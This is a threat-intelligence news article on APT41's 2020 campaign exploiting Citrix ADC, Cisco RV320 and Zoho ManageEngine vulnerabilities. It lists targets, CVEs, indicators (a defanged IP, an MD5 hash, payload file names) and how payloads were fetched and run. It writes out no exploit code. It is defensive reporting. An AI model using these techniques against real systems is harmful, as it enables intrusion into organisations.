APT41 Zeroes in on Numerous Organizations Using Known Exploits Affecting Ctirix, Cisco, and Zoho Products

  • The targets included organizations in Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, and more.
  • The attack campaign has targeted multiple industries such as banking, finance, construction, defense, government, healthcare, high technology, higher education, and more.

APT41, a Chinese cyberespionage group, has been observed exploiting multiple vulnerabilities in a variety of enterprise products to launch attacks across the globe. Touted as one of the largest attack campaigns, the exploits include vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central. The campaign was observed to be active from January 20 to March 11, 2020.

Which are the victim countries?
According to FireEye, the targets include organizations in Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, UK, and the USA.

The campaign has targeted multiple industries such as banking/finance, construction, defense, government, healthcare, high technology, higher education, legal, and manufacturing. Apart from these, firms in media, non-profit, oil & gas, petrochemicals, pharmaceuticals, real estate, telecommunications, transportation, travel, and utility sector were also affected in the attacks.

Highlighting the group’s procedure, researchers said, “It’s unclear if APT41 scanned the Internet and attempted exploitation en masse or selected a subset of specific organizations to target, but the victims appear to be more targeted in nature.”

What are the exploited vulnerabilities?

CVE-2019-19781 in Citrix ADC - Starting on January 20, 2020, APT41 used the IP address 66.42.98[.]220 to scan Citrix Application Delivery Controller (ADC) and Citrix Gateway devices vulnerable to CVE-2019-19781.

After a lull in activity till February 1, APT41 began using the exploit payloads that initiated a download via the File Transfer Protocol (FTP). There was a spike in the activity on February 24 and 25 - almost identical to the activity on February 1.

CVE-2019-1653 and CVE-2019-1652 in Cisco routers - On February 21, 2020, APT41 successfully exploited a Cisco RV 320 router at a telecommunications organization and downloaded a 32-bit ELF binary payload compiled for a 64-bit MIPS processor named ‘fuc’  (MD5: 155e98e5ca8d662fad7dc84187340cbc).

Researchers explained, “It is unknown what specific exploit was used, but there is a Metasploit module that combines two CVE’s (CVE-2019-1653 and CVE-2019-1652) to enable remote code execution on Cisco RV320 and RV325 small business routers and uses wget to download the specified payload.”

Exploitation of CVE-2020-10189 in Zoho ManageEngine - Beginning on March 8, 2020, APT41 attempted to exploit the Zoho ManageEngine vulnerability at more than a dozen organizations. FireEye had observed two separate variations of how the payloads were deployed. In the first variant, CVE-2020-10189 was exploited to directly upload the ‘logger.zip’ file to download and execute install.bat and storessyncsvc.dll.

However, in the second variation, the researchers observed that APT41 leveraged the Microsoft BITSAdmin command-line tool to download install.bat from a known IP address 66.42.98[.]220 on port 12345. In both variations, the ‘install.bat’ file was used to inject the Cobalt Strike BEACON loader named storesyncsvc.dll.

Conclusion
In 2020, APT41 continues to be one of the most prolific threats that security researchers have tracked. This new activity from the group indicates how resourceful it is and how quickly they can leverage newly discovered vulnerabilities to their advantage.